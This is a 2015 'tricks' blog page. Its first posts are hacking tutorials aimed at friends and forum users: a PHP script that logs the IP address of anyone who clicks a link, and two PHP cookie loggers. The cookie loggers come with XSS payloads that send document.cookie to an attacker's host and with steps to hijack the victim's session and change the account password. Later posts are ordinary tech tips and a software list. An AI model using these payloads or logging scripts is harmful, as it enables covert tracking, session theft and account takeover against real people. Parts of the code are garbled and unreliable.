Showing posts with label trick. Show all posts
Showing posts with label trick. Show all posts

Sunday, 2 August 2015

IP Address Hacking

This tutorial is going to show you how to hack an IP address of any remote computer.
Most of you may be curious to know this method because you want to find the IP address
of your friend's computer in order to Hack him/her.
Here is the step by step tutorial of "How to Hack IP Address”

Steps
1. Make a text file with any name. I am taking ip_ad.txt 
2. Open notepad and type in the code in PHP
OR download these script from here (click here
-------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("hack_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file,$data);
fclose($file);
header('Location:
http://pcworldtrickz.blogspot.in/'); 
?>
-------------------------------
3. Save this file as ip.php.
4. Open a new account in www.my3gb.com or www.byethost.com
    (or any free host that supports PHP).
5. Upload these two files ip.php and ip_ad.txt into the root folder
    of your hosting account using the File Manager.
6. You can rename the ip.php to any name of your choice. 
7. Set the permission to 777 on ip_ad.txt.
8. Now you are all set to find the IP address of your friend or
    any remote computer of your choice.

All you have to do is send the link of ip.php to your friend or the
person with whom you are chatting or want to hack. Once the
person clicks on the link, his IP address is recorded in the file ip_ad.txt.

For better understanding let's take up the following example. 
-----------------------
Suppose you open a new account in  byethost.com with the
sub domain as ABC, and then your IP Finder link would be

http://abc.byethost.com/ip.php  

You have to send the above link to you friend via email or while chatting and
ask him to visit that link. Once your friend clicks on the link,
his IP address will be recorded along with the Date and Time in the ip_ad.txt file.
After recording the IP address, the script will redirect the person to facebook.com.

The IP address store into the ip_ad.txt file in the following form
----------------------- 
102.54.xxx.x Thursday 07th of July 2015 05:35:20 AM
159.145.xx.xx Thursday 07th of July 2015 09:38:02  PM
13.192.44.xx Thursday 07th of July 2015 10:38:11 AM
----------------------

NOTE: You will have to replace abc with your subdomain name.

Session hijacking or cookie stealing using php and javascript

What is a cookie?
A cookie known as a web cookie or HTTP cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged every time it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
 

What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
  

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookies can later be utilized. 

PHP Code:
----------------------------- 

<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>
 
-----------------------------

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)
 

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>


Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
    

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>


Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>


All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don't forget to comment if you like my post.

How To Make Cookie Logger

What is cookie logger ?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif
 
Click To Download Script here
 
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Click to download here

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Thursday, 21 May 2015

Change Facebook Name Before 60 Days [2015]


Many of users want to change their Facebook name but find it hard
Today I am going to share you a trick with which you can change your name(ONLY old names).

Just Follow the below steps :

Step 1: Log in to your Facebook account
Step 2: Visit : https://www.facebook.com/hacked
Step 3: Now type the password
Step 4: Change email if you want
Step 5: Change password if you want
Step 6: Now change the name
Step 7: Select security options if you want and DONE!

Saturday, 2 May 2015

How to Use PC’s Internet Connection on Android Device

You would probably aware with connect your computers with your smartphone, to use phone’s internet connection on your PC. Here we talk about the “reverse connecting” and let you know how to connect your android phone or tablet to your PC to use computer’s internet connection.

Note: To do this you need a rooted Android phone and a Windows PC, but keep in mind the steps are easy if your computer has WiFi to create WiFi hotspot using a utility connection.

Basics

Before we start using this utility, you must have USB debugging enabled on your android device. For this go to Settings >> Applications >> Development >> Check USB Debugging. Might be you would also disable SuperUser access notifications, for this go to SuperUser App >> Menu >> Performances >> uncheck Notifications.
Tip: In case you don’t see the SuperUser app on your phone, it means your phone is not rooted.
You also require installing device’s USB driver on your computer after getting from device manufacturer or finding it on Google.

Tools


This is a Windows utility that uses ADB (Android Debug Bridge) that shares PCD’s Internet connection with your Android device using USB. It uses a duplicate of ADB, so you might not need the Android SDK installed on your computer. Download it from here.
Download and extract the downloaded ReverseTethering.zip file and run the AndroidTool.exe application inside its folder.

Connecting

Plug your android device to your PC with USB cable, than go to Select a device >> drop-down box >> click Connect on “Android Reverse Tethering Tool”. Once it connected to your android device it installs Busybox and Redsocks on on your phone. Go to SuperUser and allow the USB Tunnel tool on your device.
At this stage if you face a crash close, you might have to repeat the above shared process again. Or keep clicking on “Kill ADB” on the Tools tab that may re-launch ADB process. As the tool manage to create a connection you wills see connection notification.

Usage


Once it got set up after following above shared steps, open the apps and use internet. This way you can use your Android device forward network circulation with USB cable to your PC, which help you to use your computer’s Internet connection. The Windows application will keep showing all information about the connections.
The above shared method is to use internet on your android device if you don’t have a WiFi connection or 3G facility on your android device. Otherwise to use internet through network 3G connection or WiFi would be the best solution for you. This way you would have to stay stick with your PC as your phone will be connected to your computer with USB cable as this method is to transfer data through cable not over the air

How to Unlock Android Phone Lock Pattern Without Factory Reset


Pattern lock is a useful tool to secure your Android phone. This lock is important to secure your sensitive files and data from the guest users. But the trouble starts when you forget your settled pattern; it would be irritating when you will not be able to use your phone because of this issue. We know you must be looking for the answer to this important question, “How to unlock Android phone pattern lock without factory reset”. This tutorial will help you to unlock your phone using your Google account.
The new devices usually have built-in unlock patterns, which is easy to use but after several wrong attempts it locks permanently. When it happens, you have to use your ID that you use in your Google Play store to unlock that forgotten pattern. But there is a problem with this method if you are not connected to the internet then you will not be able to unlock your phone without this method.
However, you don’t need to worry about, in this tutorial you will learn how to unlock and reset your Android device in case you have forgotten your phone’s pattern. Follow the given steps and get your work done without paying any cost to the experts.

1. Unlock Pattern with Google Account

When we try to unlock our phone using wrong patterns, a message appears with two options “next” and “try again”.
Step 1. Go with the “next” where you can see two options to unlock your phone, one is to answer the security question, and the other is to provide Google account details.
Step 2. If you have settled your security question, answer it and get your phone unlocked quickly. On the other hand, if you didn’t set security question you would have to provide your Google account details.
Step 3. After this process, you will be able to choose a new pattern to use for the next time.
By following above methods, you will be able to unlock Android phone pattern lock without a factory reset. Happy using your Android device! We hardly prefer this way to unlock your phone, it helps you to avoid important data loss and saves your time.

2. Unlock Pattern Without Google Account

 Step 1. Switch off your smartphone and wait for a while when switched off
Step 2. Press Volume up + Home Key + Power Button; hold these buttons until the phone boots. (If your device doesn’t contain ‘home’ button simply hold other two buttons)
Step 3. When your phone will boot, the screen will appear with different options
Step 4. Now scroll down the screen using volume key and choose “Restore Factory Defaults” or “Delete all User Data” depending on the options shown by your device.
Step 5. After the above settings, choose the “Reboot System Now” and wait for your phone to reboot
Caution
  • This way you may lose all your data and apps through operating it without Google account.
  • This is general factory reset option to unlock your phone, but for specific phone’s factory reset you have to search for your Android phone or tablet.

Tuesday, 24 March 2015

25 Useful softwares for Windows Users:

1.Good Antivirus:-

A good Antivirus is must for PC to safeguard your PC from harmful threats,trojans ,malwares,spywares etc.
In this case I would recommend any of the top 5 Antivirus:
Bit Defender
Kaspersky
Norton Internet Security
AVG Antiivrus
Aviara

Listening to songs and watching movies is one of the most important thing we do in our PC.So we need a good media player which can play almost all formats of files.So Vlc Media Player comes 2nd in the list.

3.Registry Cleaners/Tune up Utilities:-

You need an all one one softwares which cleans registry errors and junk files from your PC and makes your PC smooth and fast.For this I would recommend Tuneup Utilities/Uniblue Power Suite/Ccleaner.
I suggest you to get those three softwares and run those 3 softwares when you start using your PC .I guarantee you that your PC will run like a dream using these softwares.

Nero is a best softwares if you want to burn any type of CD or DVD but nero is not free so I recommend Img Burner which is very much similar to Nero but you can get it for free.

These are the two leading browsers and I recommend you to get these two browsers.
Mozilla Firefox is the best browser ever made for its multi functional use.Google Chrome is the fastest and safest browser. 

6.MS Office / Open Office:-

We cant imagine a business without MS Office.Right from student to a Business Man its a must software but its not for free so I recommend you to use Open Office which is very much similar to MS office but its for free.

If you want to read ebooks and pdf documents then its a must software for you.

8.7 Zip:-

Open source Windows utility for manipulating archives. Formats 7z, ZIP, GZIP, BZIP2 and TAR are supported fully, other formats can be unpacked. It has the highest compression ratio ever.

IDM is a must softwares for PC as it increases our overall download speed by 5 times.

Utorrent is a light weight and very efficient torrent to download files from utorrent.

11.Adobe Photoshop/GIMP:-

Adobe Photoshop is a must software for editing photo but its not for free,I have an alternative for this GIMP which is free and very much similar to Adobe Photoshop.

12.Revo Uninstaller:-

Revo Uninstaller is a freeware innovative uninstall utility much faster than Windows Add/Remove applet. With its advanced and fast algorithm, Revo Uninstaller scans before and after you uninstall an application.

13.Adobe Flash Player:-

This is a must software if you want to watch flash videos on your computer.

14.Malware Bytes:-

Malware Bytes is a tool that removes malicious and infected area of your PC and it can optimize your PC performance.

15.Zone Alarm Firewall:-

Zone Alarm is a cutting edge firewall security option which blocks dangerous sites and downloads. Zone Alarm comes with a ‘Two way firewall’ which keeps track of all incoming and outgoing traffic protecting you from hackers and other intruders.

16.Team Viewer:-

Team Viewer is the best software for remote desktop viewing .You can share your desktop from anywhere in this world with this software.
Notepad++ is a free source and best text editor for several programming languages under windows environment.
Folder locker allows you to store all you files with a protected password.

19.Sandboxie:-

This is a must software for virus testers .If you download any applicattion from internet just run it in Sandboxie to check whether its infected or not.

20.Keyscrambler:-

In this world of internet you cant guess when a keylogger gets installed on your PC and loose your confidential passwords.Keyscrambler software scrambles your keys and helps to stay safe even if keylogger gets installed.

21.Winrar:-

Winrar is a must software for a PC as you can compress and store files and also most of the files which we download are compressed so winrar is must even to extract those files.

22.File Opener:-

File Opener is a software which can open different formats.This software can fulfill need of 10 softwares for opening files. 

Vmware helps us in installing multiple Operating Systems over one Operating System. Puzzled??? Well, to simplify things, Vmware allows us to run multiple Operating Systems(called slaves) on our computer. Say you are having Windows 7 installed on your computer as the main Operating System. Vmware runs as an application on Windows 7 and allows us to install other Operating Systems like Windows XP, Linux and 20 other types of Operating Systems. So, you don’t need to boot your computer to change your Operating systems. One Vmware Workstation can accomodate 20 such Operating systems.
Vmware is particularly useful for testing purposes. Also, there are some softwares which do not upgrade themselves according to new updates. Vmware can be pretty useful for such softwares. If you want to have a free alternative to Vmware, try out VirtualBox.

24.DEEP FREEZE:

Deep Freeze is another virtualization software. It is mainly used to keeping computers intact and preventing systems from being infected. It functions similar to Sandboxie. Deep Freeze makes computer configurations indestructible and prevents against unwanted workstation changes—regardless of whether they are accidental or malicious. Deep Freeze is proven to reduce help desk support incidents and allows IT personnel to focus on more strategic IT needs.

Monday, 16 February 2015

Add Extra Features in Youtube with Youtube Script




YouTube Center Script:
In this script you don't have to click to change the video resolution to the highest quality available.It's super easy to download a video. Just click on "Download", to download your desired resolution and format (You can change that in the settings). If you want to see the available formats and resolutions, click on the arrow, just next to "Download", to show the menu.
If you are watching/listening to a video and you would like it to repeat. There's a simple button, "Repeat", which you click on and the video will repeat until you click on the button again.
It's possible to use the YouTube player shortcuts like SPACE (Play/Pause), outside of the player.  


Features:

  • Download Video Button
  • Repeat Video Button
  • HTML5 Support
  • MP3 Online Converter (Link to an online converter in the download list) - You need to activate this in the settings first.
  • Automatic selection of video resolution
  • YouTube Player shortcuts on page (Shortcuts works outside of player). 
  • Prevent YouTube to auto-play or auto-buffer
Steps for Installing this script on your Browser:

I) For Firefox:

i) First install Greasemonkey for firefox. Goto Click here to Install


ii) You will see a small +Add to Firefox button on greasemonkey website click on it.

                          
iii) After that you will see dialog box click on install  button.

iv) When greasemonkey install a box will be show at top of browser and click on it to restart your browser.


v) Now you need to install YouTube Script. Goto Click me 


vi) You will see a small install  button on website click on it.

  


vii) After that a dialog will be appear and click on install button.



viii) You are done and visit youtube.com you will see three extra buttons like

                                       





2) For Google Chrome,Internet Explorer or Other Browser:

i) Just install Youtube script.Goto click me 
  
ii) click on install button and you will see a message on bottom and click on continue.


iii) A new dialog will be open and click on install.



iv) You are almost done and goto youtube.com and play vidoe then you will see three extra buttons.